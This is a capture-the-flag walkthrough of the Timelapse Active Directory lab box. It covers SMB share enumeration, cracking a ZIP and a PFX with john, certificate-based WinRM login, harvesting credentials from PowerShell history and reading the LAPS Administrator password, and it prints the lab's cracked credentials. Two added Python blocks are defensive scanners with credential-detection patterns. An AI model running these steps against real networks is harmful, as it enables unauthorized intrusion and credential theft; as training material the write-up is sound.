Overview

Timelapse is an Active Directory machine that demonstrates how exposed SMB backups can lead to certificate-based WinRM access, followed by credential discovery in PowerShell history and full compromise through LAPS password retrieval.

Attack Chain

  • Enumerate exposed Active Directory services
  • Discover anonymous SMB access to the Shares share
  • Download a password-protected WinRM backup archive
  • Crack the ZIP password with zip2john and john
  • Extract a password-protected PFX certificate file
  • Crack the PFX password and extract the certificate and private key
  • Authenticate over WinRM with certificate-based authentication as legacyy
  • Recover svc_deploy credentials from PowerShell history
  • Identify svc_deploy as a member of LAPS_Readers
  • Read the local Administrator password from LAPS
  • Authenticate as Administrator over WinRM

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.129.66.33; export NAME=TIMELAPSE; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,59260

[Screenshot: nmap results]

Findings

The scan results show a typical Active Directory attack surface. DNS (53), Kerberos (88), RPC (135), SMB (139, 445), LDAP (389, 636), and the Global Catalog ports 3268 and 3269 are exposed. WinRM over HTTPS is also available on port 5986, which becomes important later because the initial access path uses certificate-based authentication.


SMB Enumeration

With SMB exposed, we check whether anonymous share enumeration is allowed.

smbclient -N -L //$IP/

A non-default share named Shares is available.

[Screenshot: smb shares]

We connect to the share to inspect its contents.

smbclient //$IP/Shares

Inside the share, there are two folders: Dev and HelpDesk.

[Screenshot: shares folders]

To make local analysis easier, the accessible content is downloaded recursively with smbget.

smbget --recursive --guest smb://$IP/Shares/

[Screenshot: smbget download]

The Dev directory contains winrm_backup.zip, but the archive is password protected.

[Screenshot: password protected zip]
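A check a share owner or blue team can run over a local mirror of the share (for instance the tree smbget produced), added here as an example and not part of the original writeup: it walks the mirror and reports certificate and key files, including ones listed inside ZIP archives, because ZIP member names are stored in the clear even when the archive itself is password protected. The directory layout in demo_findings is constructed to mirror Dev/winrm_backup.zip; the PFX bytes are a placeholder, not a real PKCS#12 blob.

```python
import os
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional

# Key material that has no business on a broadly readable share, loose or archived.
SENSITIVE_SUFFIXES = (".pfx", ".p12", ".pem", ".key", ".ppk", ".kdbx")

@dataclass
class Finding:
    path: str              # file relative to the mirror root
    member: Optional[str]  # archive member name, None for a loose file
    encrypted: bool        # member carries the ZIP "encrypted" flag bit

def is_sensitive(name: str) -> bool:
    return name.lower().endswith(SENSITIVE_SUFFIXES)

def scan_share_mirror(root: str) -> List[Finding]:
    """Walk a local mirror of a share (what smbget pulled down) and report
    certificate/key files, including ones inside ZIP archives. ZIP member names
    are stored in the clear even when the archive is password protected, so a
    backup holding a .pfx is visible without any cracking."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if is_sensitive(fn):
                findings.append(Finding(rel, None, False))
            elif zipfile.is_zipfile(full):
                with zipfile.ZipFile(full) as zf:
                    for info in zf.infolist():
                        if is_sensitive(info.filename):
                            encrypted = bool(info.flag_bits & 0x1)
                            findings.append(Finding(rel, info.filename, encrypted))
    return findings

def demo_findings() -> List[Finding]:
    """Constructed sample mirroring the share layout on the box: Dev holds a
    backup ZIP with a PFX inside, HelpDesk holds a harmless text file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Dev"))
        os.makedirs(os.path.join(root, "HelpDesk"))
        with zipfile.ZipFile(os.path.join(root, "Dev", "winrm_backup.zip"), "w") as zf:
            zf.writestr("legacyy_dev_auth.pfx", b"placeholder, not a real PKCS#12 blob")
        with open(os.path.join(root, "HelpDesk", "notes.txt"), "w") as fh:
            fh.write("nothing sensitive here\n")
        return scan_share_mirror(root)
```

Calling demo_findings() returns one Finding for Dev/winrm_backup.zip with member legacyy_dev_auth.pfx; on a real mirror, point scan_share_mirror at the download directory instead.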


Foothold

Cracking the WinRM Backup Archive

To crack the ZIP file, we first convert it into a John-readable hash using zip2john.

zip2john Dev/winrm_backup.zip > winrm_backup.hash

[Screenshot: zip2john]

The hash is then cracked with john using rockyou.txt.

john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.hash

The password is recovered successfully.

[Screenshot: john zip password]

supremelegacy

Using the recovered password, the archive is extracted and reveals legacyy_dev_auth.pfx.

[Screenshot: extract pfx]

A PFX file stores a certificate together with its corresponding private key. In this case, it is also password protected, so we need to crack it before it can be used.

Cracking the PFX Password

The PFX file is converted into a John-readable hash with pfx2john.

pfx2john legacyy_dev_auth.pfx > pfx.hash

Then the hash is cracked with john.

john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash

The password is recovered successfully.

[Screenshot: john pfx password]

thuglegacy

Extracting the Certificate and Private Key

With the PFX password known, openssl is used to extract the private key and certificate.

openssl pkcs12 -in loot/legacyy_dev_auth.pfx -nocerts -out private_key.key -nodes

openssl pkcs12 -in loot/legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt

The result is a usable private key and certificate pair.

[Screenshot: extract certificate and key]

WinRM Certificate Authentication

Because WinRM over HTTPS is open on port 5986, we can authenticate with evil-winrm using the extracted certificate and private key. The -S flag enables SSL, while -c and -k provide the certificate and key.

evil-winrm -i $IP -S -c certificate.crt -k private_key.key

This gives us a shell as legacyy.

[Screenshot: legacyy winrm shell]

The user flag can now be read.

type C:\Users\legacyy\Desktop\user.txt

[Screenshot: user flag]


Lateral Movement

PowerShell History Enumeration

After gaining access as legacyy, we search user directories for PowerShell history files.

Get-ChildItem -Path "C:\Users" -Filter "ConsoleHost_history.txt" -Recurse -ErrorAction SilentlyContinue -Force

[Screenshot: powershell history search]

The history file is located at:

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Reviewing the file reveals credentials for the svc_deploy service account.

[Screenshot: svc deploy credentials]

svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
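Detection logic for this kind of leak, added here as an example rather than something from the original writeup: it scans a PSReadLine ConsoleHost_history.txt for patterns that put a secret on the command line (ConvertTo-SecureString -AsPlainText, a literal PSCredential construction, net use with a password) and redacts each match so it can be reported without copying the secret. SAMPLE_HISTORY and the passwords in it are constructed; the regex rules are my own and are not exhaustive.

```python
import re
from typing import List, NamedTuple

# Constructed sample of a PSReadLine ConsoleHost_history.txt. The secrets are
# placeholders, not values from the box.
SAMPLE_HISTORY = r"""whoami
ls C:\Users\legacyy\Desktop
$p = ConvertTo-SecureString 'Example-Passw0rd!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -scriptblock { whoami }
net use Z: \\fileserver\share /user:helpdesk SecondExample1
exit
"""

class Hit(NamedTuple):
    line_no: int
    rule: str
    line: str

# (rule name, regex). PowerShell is case-insensitive, so the patterns are too.
RULES = [
    ("plaintext-securestring", r"ConvertTo-SecureString\s+(['\"]).+?\1\s+-AsPlainText"),
    ("pscredential-literal", r"PSCredential\s*\(\s*['\"][^'\"]+['\"]\s*,"),
    ("net-use-password", r"\bnet\s+use\b.*/user:\S+\s+\S+"),
    ("password-argument", r"-(?:Password|Pass|Pwd|Secret)\s+['\"]?[^\s'\"]+"),
]

def scan_history(text: str) -> List[Hit]:
    """Return every history line that matches a credential-exposure rule."""
    hits: List[Hit] = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, pattern in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                hits.append(Hit(n, name, line))
    return hits

def redact(line: str) -> str:
    """Mask quoted literals and net-use passwords so a hit can go into a
    ticket without the secret travelling along with it."""
    line = re.sub(r"(['\"]).*?\1", r"\1<redacted>\1", line)
    return re.sub(r"(/user:\S+\s+)\S+", r"\1<redacted>", line, flags=re.IGNORECASE)

if __name__ == "__main__":
    for h in scan_history(SAMPLE_HISTORY):
        print(f"line {h.line_no} [{h.rule}]: {redact(h.line)}")
```

Run it against each user's history file under C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine to find the same exposure the writeup found by hand.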

Shell as svc_deploy

The credentials are used with evil-winrm. Since WinRM is exposed over HTTPS on this machine, the -S flag is used again.

evil-winrm -i $IP -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

This gives us a shell as svc_deploy.

[Screenshot: svc deploy winrm shell]


Privilege Escalation

Group Enumeration

With access as svc_deploy, we check the account’s domain group membership.

net user svc_deploy /domain

The LAPS_Readers group immediately stands out. LAPS is the Local Administrator Password Solution, which is used to manage local administrator passwords on domain-joined machines.

[Screenshot: laps readers group]

Membership in LAPS_Readers suggests that the account may be able to read the local Administrator password stored in Active Directory.

Reading the LAPS Password with NetExec

There are multiple ways to retrieve LAPS passwords from Active Directory. Here, netexec is used first with the laps module.

nxc ldap $IP -d timelapse.htb -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' --module laps

The command successfully retrieves the local Administrator password.

[Screenshot: nxc laps password]

Reading the LAPS Password with LDAPSearch

The same password can also be read directly with ldapsearch by querying for the ms-MCS-AdmPwd attribute.

When passing the password on the command line inside double quotes, the $ character needs to be escaped so the shell does not expand it as a variable.

ldapsearch -H ldap://$IP -x -b "DC=timelapse,DC=htb" -D "svc_deploy@timelapse.htb" -w "E3R\$Q62^12p7PLlC%KWaxuaV" '(ms-MCS-AdmPwd=*)' ms-Mcs-AdmPwd

This also returns the Administrator password.

[Screenshot: ldapsearch laps password]

The recovered local Administrator credentials are:

Administrator:84Za(;o0!4L00a2T[UNwE{4[

Administrator Access

Before opening a shell, the credentials are tested with netexec.

[Screenshot: administrator credentials verify]

With the credentials confirmed, an Administrator shell is opened with evil-winrm over SSL.

evil-winrm -i $IP -u 'Administrator' -p '84Za(;o0!4L00a2T[UNwE{4[' -S

This gives us an interactive shell as Administrator.

[Screenshot: administrator shell]

The root flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

[Screenshot: root flag]


Key Takeaways

Timelapse shows how exposed backup material can become a complete compromise path in Active Directory. A readable SMB share exposed a password-protected ZIP archive containing a certificate file, which enabled certificate-based WinRM access once cracked. From there, PowerShell history revealed reusable service account credentials, and LAPS_Readers membership allowed the local Administrator password to be retrieved directly from Active Directory.